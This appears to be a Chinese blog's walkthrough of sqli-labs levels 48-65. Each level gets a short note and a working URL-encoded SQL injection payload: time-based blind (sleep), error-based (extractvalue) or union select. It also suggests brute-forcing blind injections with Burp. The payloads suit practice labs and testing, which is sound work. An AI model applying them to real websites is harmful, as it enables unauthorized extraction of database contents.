sqllab第48-65关通关笔记

48关知识点:
  • 数值型注入
  • 时间盲注
    • payload:sort=1%20and%20if((mid(database(),1,1)=%27a%27),sleep(3),0)=1
    • 利用bp抓包放到爆破模块中进行爆破
49关知识点:
  • 字符型注入
  • 时间盲注
    • payload:sort=1'%20and%20if((mid(database(),1,1)=%27a%27),sleep(3),0)='1
    • 利用bp抓包放到爆破模块中进行爆破
50关知识点:
  • 数值型注入
  • 报错注入
    • payload:sort=1%20and%20extractvalue(1,concat(0x7e,database(),0x7e))
  • 时间盲注
51关知识点:
  • 字符型注入
  • 报错注入
    • payload:sort=1%27and%20extractvalue(1,concat(0x7e,database(),0x7e))=%27
52关知识点:
  • 数值型注入
  • 时间盲注
    • payload:sort=1%20and%20if((mid(database(),1,1)=%27a%27),sleep(1),0)
    • 通过bp进行爆破处数据库信息
53关知识点:
  • 字符型注入
  • 时间盲注
    • payload:sort=1%27and%20if((mid(database(),1,1)=%27s%27),sleep(1),0)=%271
    • 通过bp进行爆破
54关知识点:
  • 字符型注入
    • 单纯的单引号闭合
  • 联合注入
    • payload:id=0%27%20union%20select%201,database(),3%20%27
    • 获取数据库名后可以尝试获取表名、字段名和数据(5次以内就能找到密钥)
55关知识点:
  • 数值型注入
    • 括号闭合 (id)
  • 联合注入
    • payload:id=0)%20union%20select%201,database(),3%20--+
    • 获取数据库名后可以尝试获取表名、字段名和数据信息
56关知识点:
  • 字符型注入
    • 单引号+括号闭合
  • 联合注入
    • payload:id=0%27)union%20select%201,database(),3%20--+
    • 同上
57关知识点:
  • 字符型注入
    • 双引号闭合
  • 联合注入
    • payload:id=0"%20union%20select%201,database(),3%20"
    • 同上
58关知识点:
  • 字符型注入
    • 单引号闭合
  • 报错注入
    • payload:id=1%27 and extractvalue(1,concat(0x7e,database(),0x7e))=1 --+
    • 接着可以进行表名、字段名、数据信息的读取
59关知识点:
  • 数值型注入
  • 报错注入
    • payload:id=1%20and%20extractvalue(1,concat(0x7e,database(),0x7e))
60关知识点:
  • 字符型注入
    • 双引号+括号注入
  • 报错注入
    • payload:id=1")%20and%20extractvalue(1,concat(0x7e,database(),0x7e))%20--+
61关知识点:
  • 字符型注入
    • 单引号+双括号闭合
  • 报错注入
    • payload:id=1%27))%20and%20extractvalue(1,concat(0x7e,database(),0x7e))%20--+
62关知识点:
  • 字符型注入
    • 单引号+括号闭合
  • 时间盲注
    • payload:id=1%27)%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0%20--+
    • 如果爆破的话把sleep()时间设久一点儿,方便过滤
63关知识点:
  • 字符型注入
    • 单引号闭合
  • 时间盲注
    • payload:id=1%27%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0--+
    • 同上
64关知识点:
  • 数值型注入
  • 时间盲注
    • payload:id=1%20and%20if((mid(database(),1,1)=%27c%27),sleep(2),0)=0%20
65关知识点:
  • 字符型注入
    • 双引号+括号闭合
  • 时间盲注
    • payload:id=1")%20and%20if((mid(database(),1,1)=%27c%27),sleep(1),0)=0%20--+

10

相关推荐
使一颗心免于哀伤24 分钟前
《重构》笔记摘录 - 9.处理继承关系
笔记
再睡一夏就好31 分钟前
Linux常见工具如yum、vim、gcc、gdb的基本使用,以及编译过程和动静态链接的区别
linux·服务器·c语言·c++·笔记
俺的图图呢?1 小时前
Django笔记——CSRF
笔记·django·csrf
我的golang之路果然有问题1 小时前
快速了解redis,个人笔记
数据库·经验分享·redis·笔记·学习·缓存·内存
无心水1 小时前
【Java面试笔记:基础】8.对比Vector、ArrayList、LinkedList有何区别?
java·笔记·面试·vector·arraylist·linkedlist
卡皮巴拉爱吃小蛋糕2 小时前
MySQL的MVCC【学习笔记】
数据库·笔记·mysql
清流君2 小时前
【MySQL】数据库 Navicat 可视化工具与 MySQL 命令行基本操作
数据库·人工智能·笔记·mysql·ue5·数字孪生
BOB-wangbaohai3 小时前
Flowable7.x学习笔记(十四)查看部署流程Bpmn2.0-xml
xml·笔记·学习
m0_678693334 小时前
深度学习笔记22-RNN心脏病预测(Tensorflow)
笔记·rnn·深度学习
能来帮帮蒟蒻吗5 小时前
Docker安装(Ubuntu22版)
笔记·学习·spring cloud·docker·容器